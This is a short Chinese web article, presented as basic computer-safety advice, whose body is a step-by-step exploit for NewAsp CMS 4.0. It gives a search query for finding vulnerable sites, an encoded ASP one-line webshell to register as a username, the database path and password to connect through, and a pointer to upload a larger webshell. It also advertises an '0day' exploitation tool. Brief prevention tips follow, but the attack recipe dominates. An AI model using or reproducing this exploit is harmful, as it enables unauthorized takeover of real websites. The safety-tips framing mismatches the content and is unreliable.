随着网络的普及，我们的生活越来越方便，但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑，更要注意上网安全常识，不然病毒会对我们造成严重的威胁。

概述：

由于新云4.0对注册用户未过滤特殊字符，造成黑客通过脚本编码转换将一句话木马写入数据库文件，从而获得WEBSHELL权限。

测试：

1. 打开www.google.cn 搜索关键字:Powered By NewAsp CMS Version 4.0 或新云问吧

2. 将<%execute request("a")%> 编码转换为 ┼攠數畣整爠煥敵瑳∨≡┩愾

3. 以┼攠數畣整爠煥敵瑳∨≡┩愾为用户名注册帐户

4. 用一句话连接端连接目标站点url/ask/data/ask_newasp.asa ,密码为 a

5.上传脚本大马或者执行其它操作，这里WEBSHELL权限已经获得。

预防：

1.严格过滤注册用户名，限制注册用户名长度及禁止特殊符号。

2.更改ask/data/ask_newasp.asa 路径及名称。

3.给文件夹做权限设置，去除公共写入权限。

附工具：

新云最新Oday利用工具 1010

上面是电脑上网安全的一些基础常识，学习了安全知识，几乎可以让你免费电脑中毒的烦扰。

……